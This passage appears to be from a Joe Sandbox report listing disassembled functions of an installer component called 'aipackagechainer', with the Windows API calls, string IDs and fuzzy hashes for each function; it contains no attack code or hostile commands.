                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Thread$CloseCodeExitHandleObjectSingleTerminateWait
                                          • String ID:
                                          • API String ID: 3774109050-0
                                          • Opcode ID: 5455c0b854de0b66b5020e87a785081b9792538b64c546418a36fcdf6da80b97
                                          • Instruction ID: 46570843a41afe819478e76b0ff3c217d1b455638517c31136bce6369405b14a
                                          • Opcode Fuzzy Hash: 5455c0b854de0b66b5020e87a785081b9792538b64c546418a36fcdf6da80b97
                                          • Instruction Fuzzy Hash: 59019E31504645EFEB24CF94DD04B67B7F8FB09710F008669E92992AA0EB75AC40CB50
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00047F90,?,00000000,?), ref: 000A7EC2
                                          • GetLastError.KERNEL32(?,00000000,?), ref: 000A7ECF
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?), ref: 000A7EE3
                                          • GetExitCodeThread.KERNEL32(?,?,?,00000000,?), ref: 000A7EF1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Thread$CodeCreateErrorExitLastObjectSingleWait
                                          • String ID:
                                          • API String ID: 2732711357-0
                                          • Opcode ID: 50e96b0d3d06305e6cc2364950f08f01223788604f77be00af23761365b4e65b
                                          • Instruction ID: 4eb8c5d1e901cfe7c812a8871422c8e565b5795a2bca8e5fd040aecb881bbb12
                                          • Opcode Fuzzy Hash: 50e96b0d3d06305e6cc2364950f08f01223788604f77be00af23761365b4e65b
                                          • Instruction Fuzzy Hash: C2F0FF71508352AFE360DFA4EC08F9BBBE8EB59710F048D1AF559D25A0DB74E844CB51
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000C93A5
                                          • GetLastError.KERNEL32 ref: 000C93AC
                                          • SetEvent.KERNEL32(?), ref: 000C93BD
                                          • GetLastError.KERNEL32 ref: 000C93C3
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EventObjectSingleWait
                                          • String ID:
                                          • API String ID: 3600396749-0
                                          • Opcode ID: c4fa0c98487f0918627acd3d69fc8c4d715a401a7cc111a77f406bfca193d360
                                          • Instruction ID: 01bb99fbd36a3a130014815cd456ddf00a5400356a5bdf6192c930bb96f6372b
                                          • Opcode Fuzzy Hash: c4fa0c98487f0918627acd3d69fc8c4d715a401a7cc111a77f406bfca193d360
                                          • Instruction Fuzzy Hash: D1F082321046849BD7209BA5DC48E2EB7E4BF99330B250A2DE261835F0CF65A940EB54
                                          APIs
                                          • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,000E9956,00000000,00000001,00000000,00000000,?,000E0465,00000000,00000000,00000000), ref: 000EAD69
                                          • GetLastError.KERNEL32(?,000E9956,00000000,00000001,00000000,00000000,?,000E0465,00000000,00000000,00000000,00000000,00000000,?,000E09EC,00000000), ref: 000EAD75
                                            • Part of subcall function 000EAD3B: CloseHandle.KERNEL32(FFFFFFFE,000EAD85,?,000E9956,00000000,00000001,00000000,00000000,?,000E0465,00000000,00000000,00000000,00000000,00000000), ref: 000EAD4B
                                          • ___initconout.LIBCMT ref: 000EAD85
                                            • Part of subcall function 000EACFD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,000EAD2C,000E9943,00000000,?,000E0465,00000000,00000000,00000000,00000000), ref: 000EAD10
                                          • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,000E9956,00000000,00000001,00000000,00000000,?,000E0465,00000000,00000000,00000000,00000000), ref: 000EAD9A
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: 92176b8e53c92b3c9d0063c54838f2b3da231d7b9e5ff36d3f578ae2429d0f46
                                          • Instruction ID: eb8840707f47b1d85c19533489485fa52159597051dc35a0c206b408590252b0
                                          • Opcode Fuzzy Hash: 92176b8e53c92b3c9d0063c54838f2b3da231d7b9e5ff36d3f578ae2429d0f46
                                          • Instruction Fuzzy Hash: C0F01236504154BFDF621F93DC05A9E3F66FB09371F144010F90A95970C6329960EB91
                                          APIs
                                          • SleepConditionVariableCS.KERNELBASE(?,000CC85E,00000064), ref: 000CC8E4
                                          • LeaveCriticalSection.KERNEL32(00128FDC,00000000,?,000CC85E,00000064,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5), ref: 000CC8EE
                                          • WaitForSingleObjectEx.KERNEL32(00000000,00000000,?,000CC85E,00000064,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5), ref: 000CC8FF
                                          • EnterCriticalSection.KERNEL32(00128FDC,?,000CC85E,00000064,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5), ref: 000CC906
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                          • String ID:
                                          • API String ID: 3269011525-0
                                          • Opcode ID: d96e5623b29f3aef94bd4b9ce6a741f1e635fb4ec8b9c724f431cae612048998
                                          • Instruction ID: 8d9a308c5a9124815edc37caca1b86bb17877c4880f0e4cf379ffecacd4ddb3b
                                          • Opcode Fuzzy Hash: d96e5623b29f3aef94bd4b9ce6a741f1e635fb4ec8b9c724f431cae612048998
                                          • Instruction Fuzzy Hash: 0FE09231542134BBEB112F40ED08EAF3F1AEB08B11B004025F61962970CF741861EBD5
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 000D8ABD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__start
                                          • String ID: pow
                                          • API String ID: 3213639722-2276729525
                                          • Opcode ID: 37259d38cbb8898fde39f6780e901d7e1a259ae59ef5228c5359ed143941de8a
                                          • Instruction ID: 5d21148f9ee914ac2cb58bdc77b989b2a2722f1a96b9d19481bcfc0390d252ad
                                          • Opcode Fuzzy Hash: 37259d38cbb8898fde39f6780e901d7e1a259ae59ef5228c5359ed143941de8a
                                          • Instruction Fuzzy Hash: B25199A0A082419AEB257B29CD013BE27E8EB40710F24CD5BF0D5563E9EF758CC19B57
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .url$URL
                                          • API String ID: 0-2674294872
                                          • Opcode ID: f25ac6bc1ddfe4ee92a5cfce3c3165ecd0241c84606d4540db20f8c9f7ac24d1
                                          • Instruction ID: 6712fb2a717168c7593b5bad13868559b874d28c0b02af224aecc968b21bda88
                                          • Opcode Fuzzy Hash: f25ac6bc1ddfe4ee92a5cfce3c3165ecd0241c84606d4540db20f8c9f7ac24d1
                                          • Instruction Fuzzy Hash: 08519171A006459FDF10DFA8C888A9EBBF5EF48320F148269E915DB292DB34DD40DB90
                                          APIs
                                          • PathIsUNCW.SHLWAPI(?,D11C52E5), ref: 00066941
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Path
                                          • String ID: \\?\$\\?\UNC\
                                          • API String ID: 2875597873-3019864461
                                          • Opcode ID: ce88a45c106869b617c2dbdb89b7b1611d74c4a2a49630bc929386b5ae65e9bc
                                          • Instruction ID: b92f1ff0c6db7c1c3f871fdfa5cc0e49b483b262fb9ca8a8a83abbd109398aba
                                          • Opcode Fuzzy Hash: ce88a45c106869b617c2dbdb89b7b1611d74c4a2a49630bc929386b5ae65e9bc
                                          • Instruction Fuzzy Hash: A251B170D00204DBDB14DF68C895BAEB7F6FF95304F10861DE841A7281DB766948CBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: p1Wu
                                          • API String ID: 0-3125263879
                                          • Opcode ID: 813a6b715da2c8a6ac36a809efbf2fe0e0028e511955604a17a822c9f62656a7
                                          • Instruction ID: 205ef936d9b1c9e386b4d76edb07e15406e7655877900a8faae0f77b7bc34f1f
                                          • Opcode Fuzzy Hash: 813a6b715da2c8a6ac36a809efbf2fe0e0028e511955604a17a822c9f62656a7
                                          • Instruction Fuzzy Hash: 3F51AE30900A498FDF11DFA8C884BEEB7F1FF48325F144269E425EB292EB349945CB90
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,D11C52E5), ref: 00089772
                                          • LeaveCriticalSection.KERNEL32(?,D11C52E5,?,00000000,000EBBB0,000000FF,?,80004005), ref: 000898CF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CriticalFileLeaveModuleNameSection
                                          • String ID: LOG
                                          • API String ID: 1232429956-429402703
                                          • Opcode ID: c17b2b1305a8a03fb8762824f14b6f974969d9b824a10858de9cc1c52db72e06
                                          • Instruction ID: 396af56f5abf5fe26a444e1b3974e0a164845b5517160182382f0ba7759c2ecc
                                          • Opcode Fuzzy Hash: c17b2b1305a8a03fb8762824f14b6f974969d9b824a10858de9cc1c52db72e06
                                          • Instruction Fuzzy Hash: 8E510F31A08245DFDB24BF28C805BBA77E5FF45704F18856AE84ADB681EB759A048B80
                                          APIs
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          • GetLastError.KERNEL32(?,00000000,00000001,08000000), ref: 000ADD84
                                          • WaitForSingleObject.KERNEL32(?,0000000A,?,00000000,00000001,08000000), ref: 000ADDBD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLastObjectProcessSingleWait
                                          • String ID: REST %u
                                          • API String ID: 1530046183-3183379045
                                          • Opcode ID: 81dfbec80b3ca2e4005e88744b29d8b6f9c739740164dd48520ff2c45740536c
                                          • Instruction ID: df953bccba900304dd094ed5f4818d27c89a4bcbf079f3bf3de7389c9c508889
                                          • Opcode Fuzzy Hash: 81dfbec80b3ca2e4005e88744b29d8b6f9c739740164dd48520ff2c45740536c
                                          • Instruction Fuzzy Hash: F451C431600604AFD764DFA8CC48B6AB7E5FF52324F14862AE4578FAA1DB71ED45CB40
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?,D11C52E5,?,?,00129AFC), ref: 0008959F
                                          • CreateDirectoryW.KERNEL32(?,00000000,?,00129AFC), ref: 00089600
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryPathTemp
                                          • String ID: ADVINST_LOGS
                                          • API String ID: 2885754953-2492584244
                                          • Opcode ID: 4f541dc3ccd1a4cae06121f6e3c374217cd4cf93d0366515028a5d11665ea3d3
                                          • Instruction ID: 1fcc0b3b1ea3c9140737abc51456f431200a643c9362ebf466bd5bef1574aca8
                                          • Opcode Fuzzy Hash: 4f541dc3ccd1a4cae06121f6e3c374217cd4cf93d0366515028a5d11665ea3d3
                                          • Instruction Fuzzy Hash: 7351B275900219CADB70BF28C844BBAB3F4FF14714F2846AEE89997290FB754D81CB90
                                          APIs
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,0010DBD4,00000000,?,?,00000001,?), ref: 000A53BE
                                          • RegCloseKey.ADVAPI32(00000000,00000001), ref: 000A5419
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CloseHeapOpenProcess
                                          • String ID: hu
                                          • API String ID: 901800290-423011080
                                          • Opcode ID: 96e85d4ff020affb4d28067dfaba0b4ee3965fcc64b136b7ed368ae74ca5c434
                                          • Instruction ID: 81a127014d9c97c792c1f184e21d4065228f235659f79b0958095a8d08116599
                                          • Opcode Fuzzy Hash: 96e85d4ff020affb4d28067dfaba0b4ee3965fcc64b136b7ed368ae74ca5c434
                                          • Instruction Fuzzy Hash: 9D516DB19006099FDB10CFA8CC48BAEBBF4FF49325F148659E421A72D1DB759A04CBA0
                                          APIs
                                          • _wcsrchr.LIBVCRUNTIME ref: 000A549F
                                            • Part of subcall function 000A5020: RegOpenKeyExW.ADVAPI32(00000000,D11C52E5,00000000,00020019,00000002,D11C52E5,00000001,00000010,00000002,000A436C,D11C52E5,00000000,00000000), ref: 000A50BC
                                            • Part of subcall function 000A0850: RegQueryValueExW.ADVAPI32(?,?,00000000,000000C8,00000000,000000C8,000000C8), ref: 000A08BE
                                            • Part of subcall function 000A0850: RegQueryValueExW.ADVAPI32(?,?,00000000,00000002,00000000,00000002,00000002,000000C8), ref: 000A0900
                                          • RegCloseKey.ADVAPI32(00000000), ref: 000A5546
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: QueryValue$CloseOpen_wcsrchr
                                          • String ID: hu
                                          • API String ID: 395343754-423011080
                                          • Opcode ID: e67a2a62fa6a1c7e9943d97a74730bd8c5bd78eaa46ddb04b85a5ae0e5be61ee
                                          • Instruction ID: df3c513c337ea894e22661105c24d53f946ddc8073edf2fe83393cec10ee624a
                                          • Opcode Fuzzy Hash: e67a2a62fa6a1c7e9943d97a74730bd8c5bd78eaa46ddb04b85a5ae0e5be61ee
                                          • Instruction Fuzzy Hash: AE41D131901A49DBCB10DFA8C854B9EFBB5FF46321F148269E8159B3D2D7759A04CB90
                                          APIs
                                          • EncodePointer.KERNEL32(00000000,?), ref: 000D0953
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: EncodePointer
                                          • String ID: MOC$RCC
                                          • API String ID: 2118026453-2084237596
                                          • Opcode ID: 3242abe6cc10fa79ff756209e4c4806996d3419632d0ea85ad0b793ba1b72c36
                                          • Instruction ID: 4bc03d18b58939b1798a65b056f7b7565ea45215b8eedddbc577d2b2c801f83b
                                          • Opcode Fuzzy Hash: 3242abe6cc10fa79ff756209e4c4806996d3419632d0ea85ad0b793ba1b72c36
                                          • Instruction Fuzzy Hash: 46413572900309AFDF15DF98DC81BEEBBB5FF48300F18815AF918A6222D3359950DB61
                                          APIs
                                          • DeleteFileW.KERNEL32(?,D11C52E5,?,?,00000000,?,00000000,000F7806,000000FF), ref: 0009F567
                                          • RemoveDirectoryW.KERNEL32(?,D11C52E5,?,?,00000000,?,00000000,000F7806,000000FF), ref: 0009F58F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: DeleteDirectoryFileRemove
                                          • String ID: p1Wu
                                          • API String ID: 3325800564-3125263879
                                          • Opcode ID: 452d9bae15dd4420eec5de5c4c36fa6a9f9a7cea45632e3b4742ff069a3b56fd
                                          • Instruction ID: 1bf29d18bbf2a66e30ae6cb4aae8fedba54ddcbfed9598ad0d01a499d00299c7
                                          • Opcode Fuzzy Hash: 452d9bae15dd4420eec5de5c4c36fa6a9f9a7cea45632e3b4742ff069a3b56fd
                                          • Instruction Fuzzy Hash: FE31CE31604A45DFDB21CF68CA84B6ABBF5FF48720F1186ADE125C76A1DB70B904DB80
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 000690AB
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0006910E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                          • String ID: bad locale name
                                          • API String ID: 3988782225-1405518554
                                          • Opcode ID: 8ac85c2af2d74947a997e9382d591072e2aa48e39d953033841edc027be630d5
                                          • Instruction ID: 6c5d2f42d1da78acb4e41afa8e0a2e87f16c310812afbcc605edd909e11919e0
                                          • Opcode Fuzzy Hash: 8ac85c2af2d74947a997e9382d591072e2aa48e39d953033841edc027be630d5
                                          • Instruction Fuzzy Hash: CD21F370904784DED320CF68C904B8BBFF4AF16314F10868DE08597781D3B5AA08CB91
                                          APIs
                                          • VirtualQuery.KERNEL32(80000000,000C9B77,0000001C,000C9D6C,00000000,?,?,?,?,?,?,?,000C9B77,00000004,001287FC,000C9DFC), ref: 000C9C43
                                          • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,000C9B77,00000004,001287FC,000C9DFC), ref: 000C9C5E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: InfoQuerySystemVirtual
                                          • String ID: D
                                          • API String ID: 401686933-2746444292
                                          • Opcode ID: 7c66600afbbca68bd627c33cb41f5793ded5bacdc1ae0872a43f023d6f29c22c
                                          • Instruction ID: 3e525bf342770f6a9dab326281730dfb908ef3bac29e78347d7e3d6d726f88e7
                                          • Opcode Fuzzy Hash: 7c66600afbbca68bd627c33cb41f5793ded5bacdc1ae0872a43f023d6f29c22c
                                          • Instruction Fuzzy Hash: C101A772600109ABDB14DF29DC49FED7BEAAFC4325F0DC224ED59D7154DA38D951C680
                                          APIs
                                          • GetProcessHeap.KERNEL32(00074793,00074793), ref: 0007417D
                                          • HeapFree.KERNEL32(00000000,00074793,00074793), ref: 00074183
                                          • GetProcessHeap.KERNEL32(00074694,?), ref: 000741B7
                                          • HeapFree.KERNEL32(00000000,00074694,?), ref: 000741BD
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Heap$FreeProcess
                                          • String ID:
                                          • API String ID: 3859560861-0
                                          • Opcode ID: d92599fd293ee666a0ac1ba7a6687df167ccc6d8934efc21d5db8fc4887bcd13
                                          • Instruction ID: f3ee6b0937e1fd25ee4464f979b28b315ab9437ff06a10feae93b205d58bbcc4
